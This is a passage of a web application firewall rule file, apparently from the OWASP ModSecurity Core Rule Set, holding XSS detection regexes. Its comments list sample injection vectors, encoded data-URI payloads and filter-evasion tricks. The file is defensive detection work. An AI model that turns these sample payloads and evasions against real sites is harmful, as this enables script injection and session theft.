%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\burl\b\W*?\bjavascript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958045',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.innerhtml\b" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958004',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonselect\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958421',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\@import\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958009',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958025',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonload\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958413',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\< ?script\b" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958051',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonresize\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958420',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonclick\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958407',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\biframe\b.{0,100}?\bsrc\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958056',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bbackground-image:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958011',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonkeyup\b\W*?\=" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958412',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<input\b.*?\btype\b\W*?\bimage\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958008',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\burl\b\W*?\bshell:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958046',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\btype\b\W*?\btext\b\W*?\bjavascript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958039',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.fromcharcode\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958003',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecMarker END_XSS_CHECK # Detect tags that are the most common direct HTML injection points. # # <a href=javascript:... # <applet src="..." 
type=text/html> # <applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html> # <base href=javascript:... # <base href=... // change base URL to something else to exploit relative filename inclusion # <bgsound src=javascript:... # <body background=javascript:... # <body onload=... # <embed src=http://www.example.com/flash.swf allowScriptAccess=always # <embed src="data:image/svg+xml; # <frameset><frame src="javascript:..."></frameset> # <iframe src=javascript:... # <img src=x onerror=... # <input type=image src=javascript:... # <layer src=... # <link href="javascript:..." rel="stylesheet" type="text/css" # <link href="http://www.example.com/xss.css" rel="stylesheet" type="text/css" # <meta http-equiv="refresh" content="0;url=javascript:..." # <meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion # <meta http-equiv="link" rel=stylesheet content="http://www.example.com/xss.css"> # <meta http-equiv="Set-Cookie" content="NEW_COOKIE_VALUE"> # <object data=http://www.example.com # <object type=text/x-scriptlet data=... # <object type=application/x-shockwave-flash data=xss.swf> # <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:...></object> // not verified # <script>...</script> # <script src=http://www.example.com/xss.js></script> - TODO add another rule for this # <script src="data:text/javascript,alert(1)"></script> # <script src="data:text/javascript;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg=="></script> # <style>STYLE</style> # <style type=text/css>STYLE</style> # <style type=text/javascript>alert('xss')</style> # <table background=javascript:... # <td background=javascript: # # # NOTES # # - Reference the WASC Script Mapping Project - http://projects.webappsec.org/Script-Mapping # # - Not using closing brackets because they are not needed for the # attacks to succeed. The following seems to work in FF: <body/s/onload=... 
# # - Also, browsers sometimes tend to translate < into >, in order to "repair" # what they think was a mistake made by the programmer/template designer. # # - Browsers are flexible when it comes to what they accept as separator between # tag names and attributes. The following is commonly used in payloads: <img/src=... # A better example: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^=alert("XSS")> # # - Grave accents are sometimes used as an evasion technique (as a replacement for quotes), # but I don't believe we need to look for quotes anywhere. # # - Links do not have to be fully qualified. For example, the following works: # <script src="//ha.ckers.org/.j"> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<(a|abbr|acronym|address|applet|area|audioscope|b|base|basefront|bdo|bgsound|big|blackface|blink|blockquote|body|bq|br|button|caption|center|cite|code|col|colgroup|comment|dd|del|dfn|dir|div|dl|dt|em|embed|fieldset|fn|font|form|frame|frameset|h1|head|hr|html|i|iframe|ilayer|img|input|ins|isindex|kdb|keygen|label|layer|legend|li|limittext|link|listing|map|marquee|menu|meta|multicol|nobr|noembed|noframes|noscript|nosmartquotes|object|ol|optgroup|option|p|param|plaintext|pre|q|rt|ruby|s|samp|script|select|server|shadow|sidebar|small|spacer|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|title|tr|tt|u|ul|var|wbr|xml|xmp)\W" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973300',capture,t:none,t:jsDecode,t:lowercase,block,msg:'Possible XSS Attack Detected - HTML Tag Handler',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\ballowscriptaccess\b|\brel\b\W*?=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973301',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # TODO Would evasion such as null and whitespace work here? 
#
# Rule 973302: MIME type names inside request data.
#
# Inspected after t:htmlEntityDecode and t:lowercase: cookie values (except
# cookies whose name matches /__utm/), cookie names, argument names and
# values, and XML content.
#
# NOTE(review): "|" binds looser than concatenation, so the pattern is three
# separate alternatives: ".+application/x-shockwave-flash", "image/svg\+xml"
# and "text/(...).+". The leading ".+" therefore applies only to the flash
# type and the trailing ".+" only to the text/* types, while image/svg+xml
# matches anywhere in the value. If the intent was "a type surrounded by
# other content", the alternation needs its own group - confirm before
# changing, since that alters what the rule matches.
#
# On a match the rule adds tx.critical_anomaly_score to tx.xss_score and
# tx.anomaly_score and stores the captured text (TX.0) in a per-rule TX
# variable. "block" leaves the disruptive action to SecDefaultAction.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* ".+application/x-shockwave-flash|image/svg\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" \
    "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973302',capture,t:none,t:htmlEntityDecode,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"

# Detect event handler names
#
# <body onload=...>
# <img src=x onerror=...>
#
# Rule 973303 matches "on" + one of the listed event names at a word
# boundary, followed by optional non-word characters and "=". Only t:lowercase
# is applied; unlike 973302 there is no t:htmlEntityDecode step.
#
# NOTE(review): the event names are a closed list. Handler names that are not
# in it are outside this rule's coverage, so the list has to be maintained
# against the browsers the protected application serves.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bon(abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mousedown|mousemove|mouseout|mouseover|mouseup|move|readystatechange|reset|resize|select|submit|unload)\b\W*?=" \
    "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973303',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"

# Detect usage of common URI attributes (e.g.
src) # # <a href="javascript:...">Link</a> # <base href="javascript:..."> # <bgsound src="javascript:..."> # <body background="javascript:..."> # <frameset><frame src="javascript:..."></frameset> # <iframe src=javascript:...> # <img dynsrc=javascript:...> # <img lowsrc=javascript:...> # <img src=javascript:...> # <input type=image src=javascript:...> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\b(background|dynsrc|href|lowsrc|src)\b\W*?=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973304',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # As above, but try to catch the other bit that is necessary to execute the attack. # # <meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> # <img src=jaVaScrIpt:...> # <img src=a;avascript:...> (not evasion) # <img src="jav ascript:..."> (embedded tab; null byte, other whitespace characters work too) # <img src="jaa ascript:..."> (the combination of the above two) # # NOTES # # - htmlEntityDecode needs to be applied because this content appears in HTML # attributes, so it's not evasion. # # TODO I think asfunction only work in HTML files handled by Flash. Needs verifying. 
# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(asfunction|javascript|vbscript|data|mocha|livescript):" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973305',capture,t:none,t:htmlEntityDecode,t:lowercase,t:removeNulls,t:removeWhitespace,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # Detect attempts to use the style attribute, which works with any tag in at # least one major browser. # # <div style="background-image: url(javascript:...)"> # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bstyle\b\W*?=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'973306',capture,t:none,t:lowercase,block,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" # -- JavaScript fragments -- # # TODO Need more fragments. # # TODO What about JavaScript code hidden behind CSS? # # TODO There is a bunch of DOM-manipulation stuff that we want to cover here. 
# # alert(String.fromCharCode(88,83,83) # - window.name # - document.cookie # - document.location # - document.write # - document.styleSheets[0].addImport('yourstylesheet.css', 2); # - window.execScript("alert('test');", "JavaScript"); # - document.body.innerHTML = '' # - newObj = new ActiveXObject(servername.typename[, location]) # - A list of keywords here: http://technet.microsoft.com/en-gb/library/bb794749.aspx # - setTimeout("alert('xss')", 1000) # - xmlHttp.onreadystatechange=function() {} # - eval(location.hash.substr(1)) // used to execute JavaScript in fragment identifier # # NOTES: # # - JavaScript evasion: # # http://www.thespanner.co.uk/2007/09/19/javascript-for-hackers/ # http://www.thespanner.co.uk/2007/12/12/javascript-for-hackers-part-2/ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(fromcharcode|alert|eval)\s*\(" \ 